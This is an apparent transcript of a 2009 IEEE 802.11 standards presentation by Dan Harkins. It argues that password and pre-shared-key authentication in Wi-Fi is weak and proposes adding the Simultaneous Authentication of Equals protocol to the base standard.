90 likes | 106 Views
Secure 802.11 Authentication Using Only A Password. Authors:. Date: 2009-01-19. Abstract. Authentication using a password or pre-shared key has not been done properly in 802.11. As a result there is no way to use these credentials to secure a WLAN. Password Authentication.
E N D
Secure 802.11 Authentication Using Only A Password Authors: Date: 2009-01-19 Dan Harkins, Aruba Networks
Abstract Authentication using a password or pre-shared key has not been done properly in 802.11. As a result there is no way to use these credentials to secure a WLAN. Dan Harkins, Aruba Networks
Password Authentication • Passwords are the pre-eminent credential used for network access today. • The concept is simple to grasp for unsophisticated users. • They are easy to configure and easy to manage • They therefore tend to be: • Something easy to remember • Something that can be entered repeatedly with a low probability of error. • Weak, and problematic if not used properly. • Passwords are used today and will continue to be used tomorrow. Dan Harkins, Aruba Networks
Problems with Passwords in 802.11 • Shared key authentication • Used a statically configured key in an authentication protocol. • Uses 802.11 authentication frames, if you can’t get authenticated you can’t associate. • Fundamentally flawed. Broken in a matter of seconds. • (WPA) PSK authentication • Hashes a password with the SSID to create a key to use in a cryptographic handshake for authentication. • Uses data frames, first you do open authentication, then association, and then you exchange data frames. • Susceptible to passive, guessing attack. Broken in a matter of minutes to a matter of hours depending on how “strong” the password is Dan Harkins, Aruba Networks
Problems with Passwords in 802.11 • These issues cause continued bad press for 802.11. A simple search turns up: • “Unsafe at any key length” • “Wireless security’s broken skeleton in the closet” • “Networks suffer from wireless insecurity” • “Wireless connectivity can breed wireless insecurity” • The ease of use of passwords means they will continue to be used. • There is no way to securely use them in the standard today! Dan Harkins, Aruba Networks
Secure Password-based Authentication • TGs has a peer-to-peer protocol for using a password to authenticate mesh points. • While designed for mesh, it is suitable for STA to AP communication, IBSS, and any other peer-to-peer application. • Uses 802.11 authentication frames in a cryptographically secure protocol. Can be used to protect subsequent authentication! • Provides security against passive attack, active attack, and dictionary attack. • Resistance to attack obviates password management rules that make passwords harder to use– passwords can be “weaker” and can be shared and still not be susceptible to attack. • It fits nicely into the 802.11 state machine– authentication using authentication frames! Dan Harkins, Aruba Networks
Secure Password-based Authentication • Each side exchanges two messages, a commitment (to a guess of the password), and a confirmation (of knowledge of the password). • Uses a “zero knowledge proof” • The only information leaked by the exchange is whether you know the password or not. • Unlike (WPA)PSK an attacker cannot learn anything about the password by passively watching the exchange • An attacker gets one guess and one guess only per active attack. Countermeasures deal with repeated active attacks. • I have a proposal to add this to the base document but it needs vetting. Dan Harkins, Aruba Networks
Straw Poll • “A secure password-based authentication protocol should become part of the base 802.11 standard” Yes: No: Don’t know: Dan Harkins, Aruba Networks
References • Simultaneous Authentication of Equals: A Secure, Password-Based Key Exchange for Mesh Networks, D. Harkins, sensorcomm, pp. 839-844, Proceedings of the 2008 Second International Conference on Sensor Technologies and Applications, 2008 Dan Harkins, Aruba Networks